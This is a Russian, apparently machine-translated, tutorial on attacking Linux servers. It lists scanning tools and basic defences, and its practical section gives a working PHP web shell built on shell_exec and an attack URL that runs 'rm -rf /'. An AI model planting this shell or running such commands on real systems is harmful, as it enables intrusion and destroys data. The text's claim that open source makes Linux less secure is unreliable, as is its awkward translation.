Взлом ОС Linux: Взлом с помощью Ubuntu (Учебное пособие по командам)
Linux — наиболее широко используемая серверная операционная система, особенно для веб-серверов. Это открытый исходный код; это означает, что любой может иметь доступ к исходному коду. Это делает его менее безопасным по сравнению с другими операционными системами, поскольку злоумышленники могут изучить исходный код, чтобы найти уязвимости.. Linux для хакеров – это использование этих уязвимостей для получения несанкционированного доступа к системе.
В этой статье мы познакомим вас с тем, что такое Linux, его уязвимостями безопасности, взломом с помощью Ubuntu и контрмеры, которые вы можете принять.
Краткое примечание по Linux
Linux - это операционная система с открытым исходным кодом. Существует множество дистрибутивов операционных систем на базе Linux, таких как Redhat, Fedora и Ubuntuи т. д. В отличие от других операционных систем, Linux менее безопасен, когда дело касается безопасности. Это связано с тем, что исходный код доступен бесплатно, поэтому его легко изучить на предмет уязвимостей и использовать их по сравнению с другими операционными системами, которые не являются операционными системами с открытым исходным кодом. Linux можно использовать в качестве серверной, настольной, планшетной или мобильной операционной системы.
Программами Linux можно управлять с помощью графического интерфейса или команд. Команды Linux для Kali Linux взлом более эффективен и результативн по сравнению с использованием графического интерфейса. По этой причине полезно знать основные команды Linux для взлома.
Обратитесь к этим руководствам https://www.guru99.com/unix-linux-tutorial.html о том, как начать работу Kali Linux хаки.
Инструменты взлома Linux
- Nessus– этот инструмент можно использовать для Ubuntu взламывать, сканировать настройки конфигурации, исправления, сети и т. д. его можно найти по адресу https://www.tenable.com/products/nessus
- НМап. Этот инструмент можно использовать для мониторинга хостов, работающих на сервере, и служб, которые они используют. Его также можно использовать для сканирования портов. Его можно найти по адресу https://nmap.org/
- САРА – SARA — это аббревиатура от слова «помощник по исследованиям аудитора безопасности». Как следует из названия, этот инструмент можно использовать для аудита сетей на предмет таких угроз, как SQL-инъекция, XSS и т. д. его можно найти по адресу http://www-arc.com/sara/sara.html
Приведенный выше список не является исчерпывающим; это дает вам представление об инструментах, доступных для Ubuntu взлом и взлом Linux-систем.
Как предотвратить взлом Linux
Linux Hacking использует уязвимости операционной системы. Организация может принять следующую политику для защиты от таких атак.
- Управление патчами– патчи исправляют ошибки, которые злоумышленники используют для компрометации системы. Хорошая политика управления исправлениями обеспечит постоянное применение соответствующих исправлений к вашей системе.
- Правильная конфигурация ОС– другие эксплойты используют недостатки конфигурации сервера. Неактивные имена пользователей и демоны должны быть отключены. Настройки по умолчанию, такие как общие пароли для приложений, имена пользователей по умолчанию и некоторые номера портов, следует изменить.
- Система обнаружения вторжений– такие инструменты можно использовать для обнаружения несанкционированного доступа к системе. Некоторые инструменты имеют возможность обнаруживать и предотвращать такие атаки.
Хакерская деятельность: Взломать Ubuntu Система Linux с использованием PHP
В этом практическом сценарии мы научимся взламывать с помощью Ubuntu и мы предоставим вам основную информацию о том, как вы можете использовать PHP скомпрометировать Linux. Мы не собираемся преследовать какую-либо жертву. Если вы хотите опробовать его, вы можете установить LAMPP на свой локальный компьютер.
PHP поставляется с двумя функциями, которые можно использовать для выполнения команд взлома Linux. Он имеет функции exec() и Shell_exec(). Функция exec() возвращает последнюю строку вывода команды, а функция Shell_exec() возвращает весь результат команды в виде строки.
В демонстрационных целях предположим, что менеджеры злоумышленников загрузили следующий файл на веб-сервер.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ВОТ,
Приведенный выше сценарий получает команду из переменной GET с именем cmd. Команда выполняется с помощью Shell_exec(), а результаты возвращаются в браузер.
Приведенный выше код можно использовать, используя следующий URL-адрес.
http://localhost/cp/konsole.php?cmd=ls%20-l
ВОТ,
- «…konsole.php?cmd=ls%20-l»присваивает значение ls –l переменной cmd.
Команда в Ubuntu за взлом сервера будет выполнено как
shell_exec('ls -l') ;
Выполнение приведенного выше кода на веб-сервере дает результаты, аналогичные следующим.
Приведенная выше команда просто отображает файлы в текущем каталоге и разрешения.
Предположим, злоумышленник передает следующую команду
rm -rf /
ВОТ,
- «rm» удаляет файлы
- «rf» заставляет команду rm выполняться в рекурсивном режиме. Удаление всех папок и файлов
- «/» указывает команде начать удаление файлов из корневого каталога.
URL-адрес атаки будет выглядеть примерно так
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Итого
- Linux — популярная операционная система для серверов, настольных компьютеров, планшетов и мобильных устройств.
- Linux имеет открытый исходный код, и исходный код может получить кто угодно. Это позволяет легко обнаружить уязвимости. Это одна из лучших ОС для хакеров.
- Базовые и сетевые команды взлома в Ubuntu ценны для хакеров Linux.
- Уязвимости — это слабости, которые можно использовать для компрометации системы.
- Хорошая безопасность может помочь защитить систему от взлома злоумышленником.